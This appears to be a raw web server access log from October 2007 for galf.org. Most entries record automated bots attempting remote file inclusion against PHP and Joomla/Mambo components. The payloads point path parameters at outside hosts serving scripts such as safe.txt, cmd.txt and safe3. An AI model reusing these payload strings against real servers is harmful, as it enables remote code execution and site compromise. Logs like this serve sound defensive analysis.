64.38.3.14 - - [14/Oct/2007:12:00:40 -0700] "GET /logs/access_070917.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.3.14 - - [14/Oct/2007:12:00:40 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.67.92.21 - - [14/Oct/2007:12:00:44 -0700] "GET /index.php?configFile=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.38.3.14 - - [14/Oct/2007:12:00:46 -0700] "GET /logs/access.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://missdica.com/board/skin/zero_vote/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:01:03 -0700] "GET /logs/access_070806.log/index.php?pag=http://www.digitalcrocker.org/.1/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
203.145.134.195 - - [14/Oct/2007:12:01:26 -0700] "GET /logs/access_070611.log HTTP/1.1" 200 196608 "http://www.google.co.in/search?hl=en&q=196.11.241.97+hack&meta=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
169.207.64.5 - - [14/Oct/2007:12:01:41 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:01:42 -0700] "GET /logs/access_070806.log/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
169.207.64.5 - - [14/Oct/2007:12:01:42 -0700] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=uid=99(nobody)%20gid=99(nobody)%20groups=99(nobody)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:01:42 -0700] "GET /index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:01:43 -0700] "GET /logs/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.195.75.7 - - [14/Oct/2007:12:02:10 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.epa.gov/oms/cert/eng-cert/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
213.195.75.7 - - [14/Oct/2007:12:02:11 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.epa.gov/oms/cert/eng-cert/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "galf.org"
80.74.144.87 - - [14/Oct/2007:12:02:18 -0700] "GET /logs/access_070730.log/skin/zero_vote/login.php?dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:12:02:18 -0700] "GET /skin/zero_vote/login.php?dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:12:02:18 -0700] "GET /logs/skin/zero_vote/login.php?dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:02:25 -0700] "GET /logs/access_070806.log/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:02:26 -0700] "GET /index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:02:32 -0700] "GET /logs/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.18.160.149 - - [14/Oct/2007:12:02:55 -0700] "GET /logs/access_070611.log/modules/My_eGallery/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
80.74.144.87 - - [14/Oct/2007:12:03:19 -0700] "GET /logs/access_070917.log/skin/zero_vote/login.php?dir=http://mastimagic.org/portal/modules/mx_tinies/includes/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:06:05 -0700] "GET //modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:06:06 -0700] "GET //modules/xt_conteudo/class/toolbars.class.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
208.77.216.6 - - [14/Oct/2007:12:06:15 -0700] "GET /logs/access_070730.log/modules/My_eGallery/index.php?basepath=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.77.216.6 - - [14/Oct/2007:12:06:17 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.159.60.133 - - [14/Oct/2007:12:06:55 -0700] "GET /logs/access_070730.log/index.php?x=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
208.77.216.6 - - [14/Oct/2007:12:07:03 -0700] "GET /logs/access_070702.log/modules/My_eGallery/index.php?basepath=http://www.indyrx8club.com/forums/chat/inc/cmses/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
81.18.160.149 - - [14/Oct/2007:12:08:04 -0700] "GET /logs/access_070709.log/modules/My_eGallery/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.18.160.149 - - [14/Oct/2007:12:08:05 -0700] "GET /modules/My_eGallery/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.18.160.149 - - [14/Oct/2007:12:08:05 -0700] "GET /logs/modules/My_eGallery/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:08:15 -0700] "GET /logs/access_070826.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:08:15 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:08:16 -0700] "GET /logs//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
72.29.66.107 - - [14/Oct/2007:12:08:29 -0700] "GET /logs/access_070723.log/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:08:37 -0700] "GET /logs/access_070723.log/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:08:37 -0700] "GET /index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:08:38 -0700] "GET /logs/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.18.160.149 - - [14/Oct/2007:12:08:59 -0700] "GET /logs/access_070611.log/modules/My_eGallery/public/displayCategory.php?basepath=http://124.0.201.20/bbs000/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:09:59 -0700] "GET /logs/access_070716.log/index.php?go=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:09:59 -0700] "GET /index.php?go=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:09:59 -0700] "GET /logs/index.php?go=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
61.67.192.15 - - [14/Oct/2007:12:10:09 -0700] "GET /logs/access_070723.log/index.php?go=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:10:59 -0700] "GET /logs/access_070917.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:10:59 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
84.234.75.91 - - [14/Oct/2007:12:10:59 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
74.6.28.49 - - [14/Oct/2007:12:11:17 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
72.29.66.107 - - [14/Oct/2007:12:11:22 -0700] "GET /logs/access_070730.log/index.php?include=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:11:30 -0700] "GET /logs/access.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:12:11:52 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:12:11:53 -0700] "GET /newspublish/include.php?path[docroot]=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
203.158.4.142 - - [14/Oct/2007:12:11:57 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
203.158.4.142 - - [14/Oct/2007:12:11:58 -0700] "GET /newspublish/include.php?path[docroot]=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
202.128.72.2 - - [14/Oct/2007:12:12:20 -0700] "GET /logs/access_070806.log/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:12:12:21 -0700] "GET /index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
202.128.72.2 - - [14/Oct/2007:12:12:21 -0700] "GET /logs/index.php?open=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:12:39 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.183.248.105 - - [14/Oct/2007:12:12:41 -0700] "GET /logs/access_070910.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.183.248.105 - - [14/Oct/2007:12:12:43 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "galf.org"
85.183.248.105 - - [14/Oct/2007:12:12:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:12:59 -0700] "GET /logs/access_070716.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:12:59 -0700] "GET /logs/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:13:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
85.17.6.2 - - [14/Oct/2007:12:13:02 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:13:03 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.17.6.2 - - [14/Oct/2007:12:13:03 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://gctk.net/cleanmk/administrator/components/com_extcalendar/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:13:11 -0700] "GET /logs/access_070826.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:13:12 -0700] "GET /logs/access_070917.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
72.5.54.20 - - [14/Oct/2007:12:13:21 -0700] "GET /logs/access_070917.log//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.nrnnz.org/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [14/Oct/2007:12:13:22 -0700] "GET //administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.nrnnz.org/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [14/Oct/2007:12:13:22 -0700] "GET /logs//administrator/components/com_uhp/uhp_config.php?mosConfig_absolute_path=http://www.nrnnz.org/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:13:22 -0700] "GET /logs/access_070820.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:13:47 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:13:48 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [14/Oct/2007:12:14:17 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.nrnnz.org/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
72.5.54.20 - - [14/Oct/2007:12:14:17 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.nrnnz.org/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
213.193.222.54 - - [14/Oct/2007:12:14:29 -0700] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
213.193.222.54 - - [14/Oct/2007:12:14:29 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://www.inteligentesite.com.br/arquivos/marajoara/File/cmdtsk.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:14:50 -0700] "GET /logs/access_070625.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
85.183.248.105 - - [14/Oct/2007:12:14:50 -0700] "GET /logs/access_070702.log/components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://www.fatau.at/chat/pr.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:15:00 -0700] "GET //modules/My_eGallery/public/displayCategory.php?basepath=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
58.126.183.5 - - [14/Oct/2007:12:15:09 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fotoim.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
196.30.221.50 - - [14/Oct/2007:12:15:10 -0700] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://211.155.235.169/sewam/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:15:54 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
209.62.7.50 - - [14/Oct/2007:12:15:54 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
84.234.75.91 - - [14/Oct/2007:12:16:04 -0700] "GET /logs/access.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:16:04 -0700] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:16:05 -0700] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
67.59.185.50 - - [14/Oct/2007:12:16:08 -0700] "GET /logs/access_070826.log/index.php?go=uid=48(apache)%20gid=48(apache)%20groups=48(apache),2523(psaserv)%0A? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
84.234.75.91 - - [14/Oct/2007:12:17:04 -0700] "GET /logs/access_070910.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.richmondkpc.org/board/borid/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:17:39 -0700] "GET /logs/access_070730.log//modules/My_eGallery/public/displayCategory.php?basepath=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:35 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:35 -0700] "GET /logs//administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:36 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:36 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:36 -0700] "GET //administrator/components/com_serverstat/inst.serverstat.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:36 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:36 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:39 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:39 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.25.147.124 - - [14/Oct/2007:12:18:40 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET /logs/access_070910.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
209.62.7.50 - - [14/Oct/2007:12:20:00 -0700] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://agatsuma.bestfreewebspace.net/safe3? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:20:24 -0700] "GET /logs/access.log//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:20:24 -0700] "GET /logs//modules/xt_conteudo/config/spaw_control.config.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:20:27 -0700] "GET /logs/access.log//modules/xt_conteudo/class/toolbars.class.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.134.8 - - [14/Oct/2007:12:20:27 -0700] "GET /logs//modules/xt_conteudo/class/toolbars.class.php?spaw_root=http://www.candanfanclub.com/cache/inf.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
62.67.244.181 - - [14/Oct/2007:12:20:38 -0700] "GET /logs/access_070826.log//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
62.67.244.181 - - [14/Oct/2007:12:20:38 -0700] "GET //include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:20:39 -0700] "GET /logs//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:20:59 -0700] "GET /logs/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
217.110.144.106 - - [14/Oct/2007:12:21:00 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://amsterdam4.interfree.it/d.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
62.193.248.155 - - [14/Oct/2007:12:21:18 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.select-us.info/kunstkabinett/catalog/images/echo3? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.67.244.181 - - [14/Oct/2007:12:21:19 -0700] "GET /logs/access_070924.log//include.php?path[docroot]=http://www.dip-kostroma.ru/bak_skompa/themes/runcms/menu/images/.asc/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.76"
58.126.183.5 - - [14/Oct/2007:12:21:22 -0700] "GET /logs/access_070924.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.fotoim.kit.net/evals/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
